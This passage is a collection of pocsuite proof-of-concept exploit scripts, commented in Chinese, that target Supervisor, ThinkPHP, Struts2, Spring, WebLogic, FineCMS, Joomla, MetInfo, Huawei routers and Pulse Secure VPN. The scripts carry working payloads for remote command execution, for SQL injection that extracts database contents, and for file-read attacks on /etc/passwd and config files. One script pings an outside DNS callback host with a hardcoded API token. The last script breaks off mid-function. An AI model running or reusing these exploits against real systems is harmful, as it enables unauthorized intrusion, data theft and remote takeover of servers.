            ports = [9001]
        command = 'id'
        for port in ports:
            target = "{0}://{1}:{2}/RPC2".format(pr.scheme,
                                                 pr.hostname, str(port))
            try:
                with xmlrpc.client.ServerProxy(target) as proxy:
                    old = getattr(proxy, 'supervisor.readLog')(0, 0)

                    logfile = getattr(
                        proxy, 'supervisor.supervisord.options.logfile.strip')()
                    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')(
                        '{} | tee -a {}'.format(command, logfile))
                    result_ = getattr(proxy, 'supervisor.readLog')(0, 0)
                    msg = (result_[len(old):])
                if 'uid' in msg:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target
                    result['extra'] = {}
                    result['extra']['command'] = 'id'
                    result['extra']['evidence'] = msg
                    break
            except:
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#https://github.com/Nan3r/poc-t-db/blob/f1628efedf8dce3c88a1a099d39b99b797a186c3/script/rsync-weakpass.py



#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip

#基础基类
#pg数据库
class rsyncPOC(POCBase):
    vulID = '30'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-05-15' #漏洞公开的时间,不知道就写今天
    author = 'arr0w1' #  PoC作者的大名
    createDate ='2018-05-15'# 编写 PoC 的日期
    updateDate = '2018-05-15'# PoC 更新的时间,默认和编写时间一样
    references = 'https://rsync.samba.org'# 漏洞地址来源,0day不用写
    name = 'rsync Unauthorized access'# PoC 名称
    appPowerLink = 'https://rsync.samba.org'# 漏洞厂商主页地址
    appName = 'rsync'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'Weak-Password'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        rsync 未授权访问漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass
        
    def _verify(self):
        import socket

        #调用指纹方法
        result={}
        output = Output(self)
        message = ''

        try:
            s = socket.socket()
            socket.setdefaulttimeout(1)#两秒超时
            port = 873
            ip = self.url.split(':')[1].replace('/','')
            s.connect((ip, port))
            print('Rsync未授权访问')
            message = 'Rsync 873端口 未授权访问'
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = ip
            result['VerifyInfo']['Payload'] = message
        except Exception as e:
            print(e)
        s.close()
        print('[+]30 poc done')
        return self.save_output(result)

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


    #攻击模块
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()



#注册类
register(rsyncPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip
import re
 
 

# 基础基类
class webLogicPOC(POCBase):
    vulID = '55'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-12-11'  # 漏洞公开的时间,不知道就写今天
    author = 'xiaohuihui1'  # PoC作者的大名
    createDate = '2018-12-11'  # 编写 PoC 的日期
    updateDate = '2018-12-11'  # PoC 更新的时间,默认和编写时间一样
    references = ['']  # 漏洞地址来源,0day不用写
    name = 'thinkphp getshell'  # PoC 名称
    appPowerLink = ['']  # 漏洞厂商主页地址
    appName = 'thinkphp getshell'  # 漏洞应用名称
    appVersion = 'v5.0.23及v5.1.31以下版本'  # 漏洞影响版本
    vulType = 'thinkphp getshell'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        thinkphp getshell
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重"  # 严重,高危,中危,低危


    # 指纹方法
    def _fingerprint(self):
        pass

    # 验证模块 pocsuite -r 1-redis.py -u 1.1.1.1 --verify
    def _verify(self):
        # 调用指纹方法
        result={}

        #如果设置端口则取端口,没有设置则为默认端口
        import re
        import socket
        import time
        vul_url = "%s"%self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = int(url2ip(vul_url)[1])
        else :
            _host = url2ip(vul_url)
            _port = 80
        

        #判断端口是否开放   
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host,_port))
            #print 'Server port is OK!'
        except Exception:
           return self.save_output(result)
        sk.close()
        
        vul_ip = "http://%s:%s/" % (_host, _port)
        payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
                  "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
                  "index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222",
                  "index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]
        
        payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
                  "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
                  "index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir",
                  "index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]
        
        for p in payloads2:
            url=vul_ip+p
            try:
                text = req.get(url,timeout=4).text
                if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = p
                    return self.save_output(result)
            except Exception as e:
                print(str(e))
                pass
                
        return self.save_output(result)
            

    # 攻击模块
    def _attack(self):
        return self._verify()
        #pass

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register(webLogicPOC)




#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers = {'user-agent': 'ceshi/0.0.1', 'content-type': 'text/xml'}
poc_str = '''spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'''


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += poc_str
    try:
        res = req.get(url, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'spring_mvc_CVE-2018-1271'
    vulID = 'CVE-2018-1271'  # https://www.seebug.org/vuldb/ssvid-97483
    author = ['debug']
    vulType = '目录遍历'  # 任意文件读取
    version = '1.0'  # default version: 1.0
    references = [
        'https://blog.knownsec.com/2018/08/spring-mvc-%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9Ecve-2018-1271%E5%88%86%E6%9E%90/']
    desc = '''
		   Spring MVC存在一个目录穿越漏洞(CVE-2018-1271)。
		   Spring Framework版本5.0到5.0.4,4.3到4.3.14以及较旧的不受支持的版本允许应用程序配置Spring MVC以提供静态资源（例如CSS，JS，图像）。
		   当Spring MVC的静态资源存放在Windows系统上时，攻击可以通过构造特殊URL导致目录遍历漏洞。
		   '''
    vulDate = '2020-02-5'
    createDate = '2020-02-5'
    updateDate = '2020-02-5'
    appName = 'Spring Framework'
    appVersion = '5.0 to 5.0.4，4.3 to 4.3.14'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'app support' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'Spring MVC_CVE-2018-1271' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import time
import threading
import Queue
import hashlib
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

data = {}


def get_length(url, payload):
    max = 20
    min = 0
    while min != max - 1:
        center = int((min + max) / 2)
        ipayload = payload.format(center)
        time_start = time.time()
        resp = req.get(url + ipayload)
        time_end = time.time()
        if time_end - time_start > 2:
            min = center
        else:
            max = center
    leng = max
    return leng


class TextThread(threading.Thread):
    def __init__(self, url, payload, queue):
        threading.Thread.__init__(self)
        self.url = url
        self.payload = payload
        self.__queue = queue

    def run(self):
        global data
        url = self.url
        payload = self.payload
        queue = self.__queue
        while not queue.empty():
            max = 128
            min = 0
            init = queue.get()
            while min != max - 1:
                center = int((min + max) / 2)
                ipayload = payload.format(init, center)
                time_start = time.time()
                resp = req.get(url + ipayload)
                time_end = time.time()
                if time_end - time_start > 2:
                    min = center
                else:
                    max = center
                print(max)
            data[init] = chr(max)


def get_text(url, payload, leng):
    queue = Queue.Queue()
    for i in range(1, leng + 1):
        queue.put(i)

    thread_count = 8
    threads = []
    for i in range(0, thread_count):
        thread = TextThread(url, payload, queue)
        thread.start()
        threads.append(thread)

    for Thread in threads:
        Thread.join()


class TestPOC(POCBase):
    name = 'finecms Template limit sql injection'
    vulID = 'CVE-2017-11582'
    author = ['cws6']
    vulType = 'sql-inj'
    version = '1'
    references = [
        'https://lorexxar.cn/2017/07/26/finecms%E5%88%86%E6%9E%90/#Template-php-num%E5%8F%98%E9%87%8F-SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E-CVE-2017-11582']
    desc = '''finecms Template  在related和tags均存在limit注入'''

    vulDate = '2017-07-26'
    createDate = '2019-04-30'
    updateDate = '2019-04-30'

    appName = 'finecms'
    appVersion = '<v5.0.10'
    samples = ['threading', 'Queue', 'time', 'hashlib']
    appPowerLink = 'http://www.finecms.net/'

    def get_sys_key(self):
        resp = req.get(self.url)
        cookie_list = resp.cookies.get_dict().keys() 
        for i in cookie_list:
            if 'ci_session' in i:
                cookie = i[:-11]
        cookie_md5 = hashlib.md5()
        cookie_md5.update(cookie)
        return cookie_md5.hexdigest()



    def _attack(self):
        """attack mode"""
        result = {}
        md5_cookie = self.get_sys_key()
        self.url = self.url.strip(
            '/') + '/index.php?c=api&m=data2&auth=' + md5_cookie + '&param=action=tags catid=12 tag=12 num=1'
        payload1 = '/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,(IF(MID(length(database()),1,1)>{0},BENCHMARK(7000000,SHA1(1)),1)))),1);'
        payload2 = '/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,(IF(ascii(MID(database(),{0},1))>{1},BENCHMARK(4000000,SHA1(1)),1)))),1);'
        length = get_length(self.url, payload1)
        get_text(self.url, payload2, length)
        if data:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = ''.join(data.values())
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        md5_cookie = self.get_sys_key()
        self.url = self.url.strip(
            '/') + '/index.php?c=api&m=data2&auth=' + md5_cookie + '&param=action=tags catid=12 tag=12 num=1'
        payload = '/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,(IF(MID(length(database()),1,1)>{0},BENCHMARK(7000000,SHA1(1)),1)))),1);'
        length = get_length(self.url, payload)
        print(length)
        if length:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '68620'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-06-01'
    createDate = '2016-01-23'
    updateDate = '2016-01-23'
    references = ['http://www.seebug.org/vuldb/ssvid-68620']
    name = 'Joomla Component simpledownload 0.9.5 - LFI Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component simpledownload'
    appVersion = '0.9.5'
    vulType = 'LFI'
    desc = '''
        Joomla 组件simpledownload 0.9.5版本由于对参数controller过滤不严格，导致存在本地文件包含漏洞，
        在满足以下两个条件的前提下，可以结合%00截断，实现该漏洞的利用。
        (1)magic_quotes_gpc=off
        (2)PHP版本小于5.3.4

        该处漏洞读取/etc/passwd文件内容的POC格式如下：
        http://XXX.com/index.php?option=com_simpledownload
        &controller=../../../../../../../../../../../../../../../etc/passwd%00
    '''
    samples = ['http://tdctema.org']

    def _attack(self):
        return self._verify()

    def _verify(self):
        #利用LFI漏洞下载/etc/passwd文件
        result ={}
        #文件名称
        filename='/etc/passwd'
        #漏洞利用的地址
        payload='/index.php?option=com_simpledownload&controller='
        #..的个数
        dots='../'*14+'..'
        #截断符
        dBs='%00'
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #自定义的超时信息
        time=50
        #构造访问连接地址
        vulurl=self.url+payload+dots+filename+dBs
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=time)
        #判断返回页面内容
        if resp.status_code==200:
            #匹配内容
            match=re.search('nobody:.+?:[0-9]+:[0-9]+:.*:.*:.*', resp.content,re.S|re.M)
            if match:
                #提取文件内容成功
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vulurl
                result['FileInfo']={}
                result['FileInfo']['Filename']=filename
                result['FileInfo']['Content']=match.group(0)[:48]+'...'
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip

#基础基类
class MetinfoPOC(POCBase):
    vulID = '50'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-08-21' #漏洞公开的时间,不知道就写今天

    author = 'xiaohuihui1' #  PoC作者的大名
    createDate = '2018-08-21'# 编写 PoC 的日期
    updateDate = '2018-08-21'# PoC 更新的时间,默认和编写时间一样
    references = "https://nosec.org/home/detail/1740.html"# 漏洞地址来源,0day不用写
    name = 'metinfo 6.0.0 any file read'# PoC 名称
    appPowerLink= '#'# 漏洞厂商主页地址
    appName = 'metinfo'# 漏洞应用名称
    appVersion = '6.0.0'# 漏洞影响版本
    vulType = 'any file read'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        metinfo 6.0.0 任意文件读取
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass
        
    def _verify(self):
        result={}
        vul_url = '%s' % self.url
        import re
        import time
        import ftplib
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = 80
        vul_ip = "http://%s:%s" % (_host, _port)
        #判断端口是否开放   
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host,_port))
        except Exception:
                return self.save_output(result)
        sk.close()

        try:
            url=vul_ip+"/member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php"
            a=req.get(url).text

            if("con_db_id" in a):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = _host
                result['VerifyInfo']['Payload'] = url
        except Exception as e:
            pass
        return self.save_output(result)
    #攻击模块
    def _attack(self):
        result = {}
        return self._verify()


    #输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


#注册类
register(MetinfoPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class Huawei_E5331_Unauthorized_access(POCBase):
    vulID = '61930'  # ssvid
    version = '1.0'
    author = ['anonymous']
    vulDate = '2013-12-06'
    createDate = '2015-11-13'
    updateDate = '2015-11-13'
    references = ['http://www.sebug.net/vuldb/ssvid-61930']
    name = 'Huawei E5331 API验证绕过漏洞'
    appPowerLink = 'http://www.huawei.com'
    appName = 'Huawei E355'
    appVersion = 'Software version 21.344.11.00.414'
    vulType = 'Unauthorized access'
    desc = '''
            All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk.
           '''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/api/wlan/security-settings' % (self.url)
        response = req.get(vul_url).content

        if re.search('<WifiWpapsk>', response) and re.search('<WifiWpaencryptionmodes>', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output


register(Huawei_E5331_Unauthorized_access)


#!/usr/bin/env python3
#coding:utf-8
import socket
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'rootk1t'
    vulDate = '2020-01-15'
    createDate = '2020-07-15'
    updateDate = '2020-07-16'
    references = ['', ]
    name = 'CVE-2020-2551 Weblogic IIOP反序列化漏洞'
    appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'
    appName = 'Weblogic'
    appVersion = 'All'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。
    Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。

    CVE-2020-2551 Unauthenticated Remote Code Execution in IIOP protocol via Malicious JNDI Lookup
    10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
    '''
    def _verify(self):
        sock = None
        ports = []
        result = {}
        payload = bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')
        
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [7001, 17001, 80]
        for port in ports:
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(7)
                server_addr = (pr.hostname, int(port))
                sock.connect(server_addr)
                sock.send(payload)
                if b'GIOP' in sock.recv(20):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                    # result['extra'] = {}
                    # result['extra']['evidence']
                    break
                    
            except Exception as e:
                pass
            finally:
                if sock!=None:
                    sock.close()

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(TestPOC)


#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str
import json

class Struts2(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2018-08-24'
    createDate = '2020-07-01'
    updateDate = '2020-07-01'
    references = ['']
    name = 'Apache Struts2 远程代码执行漏洞 (S2-057/CVE-2018-11776)'
    appPowerLink = 'https://struts.apache.org/'
    appName = 'Struts2'
    appVersion = 'Struts 2.3 – 2.3.34, Struts 2.5 – 2.5.16'
    vulType = 'rce'
    desc = '''
    Apache Struts2 远程代码执行漏洞 (S2-057/CVE-2018-11776)
    '''

    def _options(self):
        o = OrderedDict()
        o['apath'] = OptString('', description='action path, default actionChain1.action', require=False)
        return o

    def _verify(self):
        result = {}
        try:
            cmd = random_str(16) + '.6eb4yw.ceye.io'
            cmd2 = 'ping ' + cmd
            payload = '%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27' + cmd2 + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
            payload2 = '%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27' + cmd2 + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
            action_path = self.get_option('apath') or '/actionChain1.action'
            target = self.url + payload + action_path
            target2 = self.url + payload2 + action_path
            r = requests.get(target, allow_redirects=False)
            r1 = requests.get(target2, allow_redirects=False)
            if r.status_code == 200 and r1.status_code != 200:
                res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                if cmd in res:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target
                    result['VerifyInfo']['Payload'] = payload
            elif r1.status_code == 200 and r.status_code != 200:
                res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                if cmd in res:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target2
                    result['VerifyInfo']['Payload'] = payload2
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        headers = {
            'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Referer':'http://96.63.216.104:8080/actionchaining/register2.action',
            'Connection':'close',
            'Cookie':'JSESSIONID=E25862AE388D006049EA9D3CEF12F246',
            'Upgrade-Insecure-Requests':'1',
            'Cache-Control':'max-age=0'
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Struts2)


#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'application/json-patch+json',
    'Accept-Language': 'en',
    'Connection': 'close'
    }
# 在tmp目录下创建success文件
poc_str = '''
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
'''


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/customers/1'
    try:
        res = req.patch(url, data=poc_str, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'SpringDataRest_RCE_CVE-2017-8046'
    vulID = 'CVE-2017-8046'  # https://www.seebug.org/vuldb/ssvid-97160
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['https://www.cnblogs.com/co10rway/p/9380441.html']
    desc = '''
		   Spring Data REST是一个构建在Spring Data之上，为了帮助开发者更加容易地开发REST风格的Web服务。
           在REST API的Patch方法中（实现[RFC6902](https://tools.ietf.org/html/rfc6902)），
           path的值被传入`setValue`，导致执行了SpEL表达式，触发远程命令执行漏洞。
		   '''
    vulDate = '2020-02-07'
    createDate = '2020-02-07'
    updateDate = '2020-02-07'
    appName = 'Spring Data REST '
    appVersion = '2.5.12, 2.6.7, 3.0 RC3'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'cause":{"cause":null,"message":"EL1010E:' in response and '.getRuntime().exec' not in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'SpringDataRest_RCE_CVE-2017-8046' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/22 14:15
# @Author : 兀
# @File : CVE-2019-11510.py
# @Software: PyCharm
# @Blog : https://3.1415926.top
# Life is Fantastic.

import urlparse

from pocsuite.api.poc import POCBase
from pocsuite.api.poc import register
from pocsuite.api.poc import Output
from pocsuite.api.request import req


class TestPOC(POCBase):
    vulID = 'CVE-2019-11510'
    version = '1'
    author = '兀'
    vulDate = '2019-08-10'
    createDate = '2019-08-14'
    updateDate = '2019-08-14'
    references = [
        "https://hackerone.com/reports/591295",
        "https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh",
        "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html"
    ]
    name = 'Pulse Secure SSL VPN Pre-auth'
    appPowerLink = 'https://www.pulsesecure.net/'
    appName = 'Pulse Secure SSL VPN '
    appVersion = '''
     8.1R15.1 / 8.2 / 8.3 / 9.0 
    '''
    vulType = ''
    desc = '''
    '''
    samples = [
    ]
    install_requires = ""

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        self.raw_url = self.url
        host = urlparse.urlparse(self.url).hostname
        port = urlparse.urlparse(self.url).port
        scheme = urlparse.urlparse(self.url).scheme
        if port is None:
            port = "80"
        else:
            port = str(port)
        if "https" == scheme:
            self.url = "%s://%s" % (scheme, host)
        else:
            self.url = "%s://%s:%s" % (scheme, host, port)
        paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
        headers = {"User-Agent": "Mozilla/5.0",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
                   "Upgrade-Insecure-Requests": "1"}
        try:
            res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15))
            if "root:x:0:0:root" in res.text and res.status_code == 200:
                result["VerifyInfo"] = {}
                result["VerifyInfo"]["URL"] = self.url
                result["VerifyInfo"]["passwd"] = res.text
                result["VerifyInfo"]["host"] = self.get_hosts()
        except Exception as e:
